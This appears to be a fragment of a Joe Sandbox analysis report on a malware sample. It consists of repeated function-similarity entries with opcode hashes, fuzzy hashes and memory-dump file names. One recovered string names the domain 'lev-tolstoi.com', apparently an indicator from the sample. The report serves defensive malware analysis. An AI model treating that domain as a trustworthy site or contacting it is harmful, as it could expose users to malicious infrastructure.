                                                                                                                                                                                                                                              • API String ID: 0-374804691
                                                                                                                                                                                                                                              • Opcode ID: 10df7c0927279d599bbc2b1c4350d7d9daca7d2e09ddbd10f2920e73c01e872e
                                                                                                                                                                                                                                              • Instruction ID: 8029fe4a6e084aab313aff5584cac9410d32c3f4a75129ce2f3e7285e8e18ee5
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 10df7c0927279d599bbc2b1c4350d7d9daca7d2e09ddbd10f2920e73c01e872e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C35121715583918FD720CF25C8916ABBBB1FFC2360F08895DE4D19B341E3789906CB9A
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: `;M
                                                                                                                                                                                                                                              • API String ID: 0-2952404845
                                                                                                                                                                                                                                              • Opcode ID: 6cff6802aec7d43d6afe4903be649ea9db6507cac3bf9239e3dd86b04a7a1eff
                                                                                                                                                                                                                                              • Instruction ID: 059b4de344f0389fcfbd0a129ab4866e355394416160b2f9847d785eba38f098
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6cff6802aec7d43d6afe4903be649ea9db6507cac3bf9239e3dd86b04a7a1eff
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 126116337499810B932C893C8C602A67E835FD3330B3DC37AA5B58B3E9EA6948475349
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: cH
                                                                                                                                                                                                                                              • API String ID: 0-3891681731
                                                                                                                                                                                                                                              • Opcode ID: b0286fa987ccb7d38c4bef9e1ffea049064d792fd76be4888d3d1c585ff3594d
                                                                                                                                                                                                                                              • Instruction ID: 5a3540364b03d32e2755996e1588e4c4bf5e6fcc8c1ce636bb50cea786306823
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b0286fa987ccb7d38c4bef9e1ffea049064d792fd76be4888d3d1c585ff3594d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1851CFB4A083109BDB149F14E89176BB3E0FF86318F45842EF98587392E7799905CB5B
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: ;<
                                                                                                                                                                                                                                              • API String ID: 0-1376026944
                                                                                                                                                                                                                                              • Opcode ID: d898f53aa03617f15bac6c74d71236b879ade587a51a1bedccbaf83da38731de
                                                                                                                                                                                                                                              • Instruction ID: 9cde48f63d3f863bbeb00c4fedb2d4330b83cf6f130183c201983538b763c930
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d898f53aa03617f15bac6c74d71236b879ade587a51a1bedccbaf83da38731de
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1251C677A4C3764BC324CE58884129FB7E2EBC5314F06892DD8D5DB685D678C90A8BC6
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: ]Q
                                                                                                                                                                                                                                              • API String ID: 0-1386238084
                                                                                                                                                                                                                                              • Opcode ID: 9ee633cbffeec24301bc9ee74d8ab62390766e60986ec8a693bca4f8303c0cc1
                                                                                                                                                                                                                                              • Instruction ID: 7674b9bde48a79ed188641be95737b09a4377f1f2bc68134c543ae7050d78e26
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9ee633cbffeec24301bc9ee74d8ab62390766e60986ec8a693bca4f8303c0cc1
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 041157A081928056C325D3285862CAFB5A15FAB709F08493DE49E273C2F734190AC79F
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: lev-tolstoi.com
                                                                                                                                                                                                                                              • API String ID: 0-483096278
                                                                                                                                                                                                                                              • Opcode ID: 7e116934128e7b329df8b5df8cf6f88a142cd16d4d5d78efb2c564c3ccd9051a
                                                                                                                                                                                                                                              • Instruction ID: e42ab6920fa7e1b818accf4144c5c14fd58737eb9f3163073b888ddf25c70b96
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7e116934128e7b329df8b5df8cf6f88a142cd16d4d5d78efb2c564c3ccd9051a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FCF0467678C3410BC3188F61ACE122BBB92ABD2200F1DB03EFA83D3341D6B0C811860E
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 6601933104a0014dbbb888b1c5739740612fe55e3edcf04a83a428248235a3ac
                                                                                                                                                                                                                                              • Instruction ID: fe507e6598e1cbec821715aad6da8095f7e4ae4a1a1870cc0040845d548402d1
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6601933104a0014dbbb888b1c5739740612fe55e3edcf04a83a428248235a3ac
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6122B372A087118BC725DF18D9806ABB3E1BFC4319F19893ED9C6A7385D738B8118B57
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 320b6add8e4b1bc69bed401e7947e97d0f3a4d1f5614b5d29e047bd57aa49e8e
                                                                                                                                                                                                                                              • Instruction ID: 54600cf9327cb17f4943d5d288c84767bdf726ba7c34c8ce2185d9069d9f23c2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 320b6add8e4b1bc69bed401e7947e97d0f3a4d1f5614b5d29e047bd57aa49e8e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6232F5B5A08B408FD314EF38C585396BBE1AB55310F148A3ED4EAC7392E679F855CB42
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: fddc0d456cbf10c81b18f316bcbee226f4c719bd6559f92519bd4faaccac97c0
                                                                                                                                                                                                                                              • Instruction ID: c3d464ee29c9662ed1a65180e0f7ea9d4aafaebe73e5e32226f9eace3ae65858
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fddc0d456cbf10c81b18f316bcbee226f4c719bd6559f92519bd4faaccac97c0
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 601245B5A09351CFE3208F28E88072BB7E1AF8B320F1A467DE59967391D7749D04CB56
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 01db1e6343fda82ec7f5e193a2e153ac06d41d2419b5769643db63438ae9b425
                                                                                                                                                                                                                                              • Instruction ID: 5964a9edaa7296345443dc599158acd1ffba8d47dfb53a771b15ccf0185069bd
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 01db1e6343fda82ec7f5e193a2e153ac06d41d2419b5769643db63438ae9b425
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5BC177756093004BD324DF20C880A6FF7A2EBD9354F29A92EF49553341DB38DC069BAB
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 34d60479625b4e57725f00c6be3d15581f9650337d0a574c0228bfc0cac6bec2
                                                                                                                                                                                                                                              • Instruction ID: 9a0cb70a8fffd754146a8111295813e3a77efb61d788ea2ed1b8da3728b5ef47
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 34d60479625b4e57725f00c6be3d15581f9650337d0a574c0228bfc0cac6bec2
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1FE18A711087418FD720CF29C880A2BBBE1EF99300F44882EE5D597792E679E944CBA6
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 72e49df5ada32d940760f69b05af5cb37587ef783ed18668a529b81b407ca231
                                                                                                                                                                                                                                              • Instruction ID: 42d072f3523506e66f78ce39eeb68de479f1329a49ab529099cf9a137a18b324
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 72e49df5ada32d940760f69b05af5cb37587ef783ed18668a529b81b407ca231
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BEC1E67160C3914BC325CF2DC49062EBBE1AFD9314F19866EE5E58B392C738D845CB96
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 97b28338cb439298e84310808a9c07277fb1d738b99ec4b16146085eee19b93c
                                                                                                                                                                                                                                              • Instruction ID: 1cded7bd987fd4ccd873280799446d377915736a3159345200abe1de19617c4d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 97b28338cb439298e84310808a9c07277fb1d738b99ec4b16146085eee19b93c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 32B14875504300AFD7109F24DC41B5ABBE1BBE8318F148A3EF898932A1E7369D5A8B46
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 80fb6d9e53bc7d8c24d2af6d223319f06daf9bbbcbc60f630cafb1600c1bf419
                                                                                                                                                                                                                                              • Instruction ID: ccd6ab73e7c67af0eb1cc51aaf64db27bd0929b5a12fb4bb7a4aed1dd42849d1
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 80fb6d9e53bc7d8c24d2af6d223319f06daf9bbbcbc60f630cafb1600c1bf419
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6BC16BB29087418FC360CF28DC96BABB7E1BF85318F09492DD1DAD6342E778A155CB46
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 1763d96da88c7464dd994feac06f4e6b37c312ebdcdcbd9838d3f5c16c18a448
                                                                                                                                                                                                                                              • Instruction ID: 3d98d7d7c9fe640716d66353307ce543177bc8d3b6063b995230530f646e3e5c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1763d96da88c7464dd994feac06f4e6b37c312ebdcdcbd9838d3f5c16c18a448
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E4915C36A042619FC725CE28C8507AF77D1AB85324F19863EECBA873C1D7399C0A97C1
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 89b25b7cd0c97384002f64a34727255ccfacb7a9636dfab79ff284406c3d75c7
                                                                                                                                                                                                                                              • Instruction ID: c290d45bf97abeaf76b1709bef3619cacd9d52dfdeceb7540b82a236ff489501
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 89b25b7cd0c97384002f64a34727255ccfacb7a9636dfab79ff284406c3d75c7
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6D91E1B19083919FD714DF24D84166BBBF1AF86314F84892EF5D54B3A2E239EC05CB4A
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                                                              • Opcode ID: f3a215d8d29dc167e79f2aac739a1c0d8174ceaa2932c158e99fca48a3de499a
                                                                                                                                                                                                                                              • Instruction ID: 7aeb77f7c2bd98fdc109b22532d399021c8efd6b8d95f1d4b3b3025c07f89934
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f3a215d8d29dc167e79f2aac739a1c0d8174ceaa2932c158e99fca48a3de499a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 09513D35A043104BDB109E69CCC436BB792FBC9360F169A7ADA9867390D7749C42CBD6
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 83e6483d3c91eb9288a52836f1717b22d7083e7b34c7777a63dfb86d97a6f055
                                                                                                                                                                                                                                              • Instruction ID: bc97d5732c7096b1fe4bde9af75fd5c5fccaf89bce8270158acf38cfdfe14c41
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 83e6483d3c91eb9288a52836f1717b22d7083e7b34c7777a63dfb86d97a6f055
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 07712426749A9147D32D8A3C4C322BB7E934FD6230F2DD76EE5F28B3E1C56948068345
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 0522f92cb967cb04bcfe8c436c3d46c2924353cc09c8de9d74365f84beded12b
                                                                                                                                                                                                                                              • Instruction ID: 1763a5ee92f4209920b35872094cb6635880f7b590a83c99dfbd89e2c2929837
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0522f92cb967cb04bcfe8c436c3d46c2924353cc09c8de9d74365f84beded12b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2B61453775A9914BD3288E3D5D113AABA834BDB334F3DD36EA4B58B3E4C5AC88024345
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: e4bad4211c1db5a0c4e645fed4d3ef18b4956e73ffbcc1fea4d29399f1885e46
                                                                                                                                                                                                                                              • Instruction ID: 69df4fefb61e95742197b3404f2a7e768cb7568a21b19ea3a27a5f4d3b32f3ff
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e4bad4211c1db5a0c4e645fed4d3ef18b4956e73ffbcc1fea4d29399f1885e46
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 247108152046410AD72CDF7485A333B7AE6AF44308B1991BFD995CF697EA7DC103878E
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                                                              • Opcode ID: 433b336b5b7cc08ab1281e325f16a96bba4b3958c397bf11549b44bdc4ad4d22
                                                                                                                                                                                                                                              • Instruction ID: f65c67b60719a1ca6b9901d6ff8965707225101a1c4d3470b90ea40d961e6437
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 433b336b5b7cc08ab1281e325f16a96bba4b3958c397bf11549b44bdc4ad4d22
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F4514A36B453005BE7189F29CC90B6BB792EBD4320F19963DE885473D0DB38AC058789
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 9abe8c44c26af862b47efc8752dedb34ee98c1e19f4fcb0d6898b391e07fa6b9
                                                                                                                                                                                                                                              • Instruction ID: 15d456820b403251f7606f293db7b2b9b80c8eb9586c925c4abcef4b8340a49b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9abe8c44c26af862b47efc8752dedb34ee98c1e19f4fcb0d6898b391e07fa6b9
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 29515CB15087549FE324DF29D49475BBBE1BB88318F044E2EE4E987350E379DA088F96
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 1bdb81da23b52f918e4cb982224e4b0a7eadefb7c206a9e811a19e8acde9f628
                                                                                                                                                                                                                                              • Instruction ID: d3f121329a3249eee32b9ce95a067a39ea28aa362b10f586c10c87bea3a21832
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1bdb81da23b52f918e4cb982224e4b0a7eadefb7c206a9e811a19e8acde9f628
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F15176B1B093A18BDB30CE6494412EBB7E0EF56340F86493FC8C587381E63C9805E34A
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: d971545b6e012707843a1dbcb1bd85669b151070c4a7855941c2288014f4fad8
                                                                                                                                                                                                                                              • Instruction ID: 1e060f94fe45e47c35fedcafb78fc0105fa796ee8a6d526f5f53e33bc6cdd69a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d971545b6e012707843a1dbcb1bd85669b151070c4a7855941c2288014f4fad8
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F5515937B199A14BC7184E3C5D603A97A534BAB330B2D933FB5B18B3D1C5A88C125359
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 686dae65ad203321fff4286047bcdf564e1cde2190e825a17d50878d44262c00
                                                                                                                                                                                                                                              • Instruction ID: b624d867613f48578dc8ee63be475a9463b009dc9a925208f9f76bd2b27ea290
